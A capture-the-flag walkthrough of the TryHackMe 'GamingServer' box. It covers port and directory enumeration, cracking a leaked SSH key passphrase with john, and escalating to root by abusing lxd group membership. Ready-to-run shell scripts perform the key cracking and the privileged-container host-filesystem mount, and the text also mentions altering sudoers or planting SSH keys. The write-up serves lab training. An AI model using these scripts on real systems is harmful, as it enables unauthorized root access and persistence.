GamingServer | TryHackMe
Let’s deploy the machine and run Nmap to find open ports (default scripts and version detection, skipping the host-discovery ping).
nmap -sC -sV -Pn 10.10.75.194
Nmap result
Ports 22 (SSH) and 80 (HTTP) are open. Let’s run gobuster for directory enumeration and save the output to a file.
gobuster dir -u http://10.10.75.194 -w /usr/share/dirb/wordlists/common.txt | tee gobuster.txt
gobuster
Now we have the gobuster results, but before going through them let’s look at the HTTP site itself as a starting point.
It looks like a dynamic website with several pages of content. Let’s check the page source to see whether it leaks anything.
The source contains an HTML comment that mentions a person named “john”. That is a likely username, so let’s note it for later. Now let’s go through the discovered directories one by one.
The robots.txt file lists a directory. Navigating to it shows three files, one of which is a dictionary (a word list).
Let’s keep that aside for now, since it may be useful for cracking something later, and explore the more interesting “secret” directory first.
The secret key in the Secret directory
We have a private SSH key. Let’s save it and crack its passphrase with john: convert the key into a crackable hash with ssh2john, then feed john the dictionary file found earlier.
With the cracked key and the username “john” from the page-source comment, we can SSH in to the box.
That gives us an SSH session as john. Let’s find the first flag.
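The cracking and login steps above, as an added example (not the original author’s commands). Assumed names: the key is saved as secretKey, the word list from the robots.txt directory as dict.lst, the target is 10.10.75.194 and the user is john; ssh2john.py is assumed to live at /usr/share/john/ as it does on Kali. The first function adds the check a practitioner wants before cracking: whether the key is passphrase-protected at all.

```shell
#!/bin/sh
# Added example (not the original author's commands). Assumed names: the key is saved
# as secretKey, the word list from the robots.txt directory as dict.lst, the target is
# 10.10.75.194 and the user is john. ssh2john.py lives at /usr/share/john/ on Kali.

# Does a PEM-format private key carry a passphrase? An unencrypted key needs no
# cracking. (For the newer "BEGIN OPENSSH PRIVATE KEY" format the equivalent test is
# `ssh-keygen -y -P '' -f "$key"`, which fails when a passphrase is required.)
key_is_encrypted() {
    grep -q '^Proc-Type: 4,ENCRYPTED' "$1"
}

# Crack the passphrase (only if there is one) and log in with the key.
crack_and_login() {
    key=$1; wordlist=$2; user=$3; target=$4
    chmod 600 "$key"                      # ssh refuses a key that others can read
    if key_is_encrypted "$key"; then
        /usr/share/john/ssh2john.py "$key" > key.hash
        john --wordlist="$wordlist" key.hash
        john --show key.hash              # prints key:<passphrase>
    fi
    ssh -i "$key" "$user@$target"         # enter the passphrase when prompted
}

# Usage (commented out so the file can be sourced without side effects):
# crack_and_login secretKey dict.lst john 10.10.75.194
```

If `john --show` prints nothing, the passphrase is not in the word list and a bigger list is the next step; if `key_is_encrypted` returns false, skip john entirely and use the key as-is.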
Next we need to elevate our privileges. sudo -l shows nothing usable. The machine’s tags on THM mention lxd, which is worth checking with id: membership in the lxd group is itself a path to root.
LXD is a next generation system container manager. It offers a user experience similar to virtual machines but using Linux containers instead. It's image based with pre-made images available for a wide number of Linux distributions and is built around a very powerful, yet pretty simple, REST API.
A public LXD privilege-escalation technique works on Ubuntu 18.04. It uses an Alpine Linux image: we build a minimal Alpine container image on the attacking machine, import it on the victim, and launch it as a privileged container that mounts the host’s root filesystem. Step by step:
1. First, clone the Alpine image-builder git repo and build the image on our machine (the attacker).
2. The build produces a compressed image as a tar.gz file.
3. Write a script that abuses the lxd group (it imports the image, creates a privileged container and attaches the host’s disk), and transfer both the image and the script to the victim machine.
4. Make the script executable and run it.
5. The script imports the image and creates a container with security.privileged=true.
6. Because the container is privileged, the victim’s root filesystem can be added to it as a disk device, which gives full access to the victim’s files from inside the container.
7. Since we are root inside the container and the victim’s root filesystem is mounted there, we can navigate to it and read the final flag.
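The seven steps above as one script, added here as an example (not the original author’s script). It assumes the lxd-alpine-builder project for the image (the page names no repository) and that the resulting file follows that builder’s alpine-v3.*-x86_64-*.tar.gz naming; the container and device names (privesc, host-root) are arbitrary. The `has_group` helper is the prerequisite check: the whole technique depends on the user being in the lxd group.

```shell
#!/bin/sh
# Added example (not the original author's script). Assumes the lxd-alpine-builder
# project and its alpine-v3.*-x86_64-*.tar.gz output; container/device names are arbitrary.

# Prerequisite check: is the group named in $1 among the remaining arguments?
# Typical call: has_group lxd $(id -Gn)
has_group() {
    needle=$1; shift
    for g in "$@"; do
        [ "$g" = "$needle" ] && return 0
    done
    return 1
}

# Steps 1-2, on the attacking machine: build the Alpine image (produces a tar.gz).
build_alpine_image() {
    git clone https://github.com/saghul/lxd-alpine-builder.git || return 1
    cd lxd-alpine-builder || return 1
    sudo ./build-alpine || return 1
    ls alpine-v*.tar.gz        # copy this file to the victim (scp, or python3 -m http.server + wget)
}

# Steps 3-7, on the victim: import the image, create a privileged container with the
# host's / attached as a disk, and drop into a root shell inside it.
lxd_escalate() {
    image=$1
    # If lxc reports that no storage pool exists, run `lxd init` (accept the defaults) first.
    lxc image import "$image" --alias alpine || return 1
    lxc init alpine privesc -c security.privileged=true || return 1
    lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true || return 1
    lxc start privesc || return 1
    # Inside the container we are root and the victim's filesystem is under /mnt/root.
    lxc exec privesc -- /bin/sh
}

# Run the victim-side part only when an image path is given on the command line.
if [ -n "${1:-}" ]; then
    has_group lxd $(id -Gn) || { echo "current user is not in the lxd group" >&2; exit 1; }
    lxd_escalate "$1"
fi
```

Inside the container shell, the victim’s root home is at /mnt/root/root. Because the mount is read-write, the same access also lets you change the host itself (for example by editing /mnt/root/etc/sudoers or dropping an SSH key into /mnt/root/root/.ssh), which is why lxd group membership should be treated as equivalent to root when hardening a box.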
Finally, we got our second flag.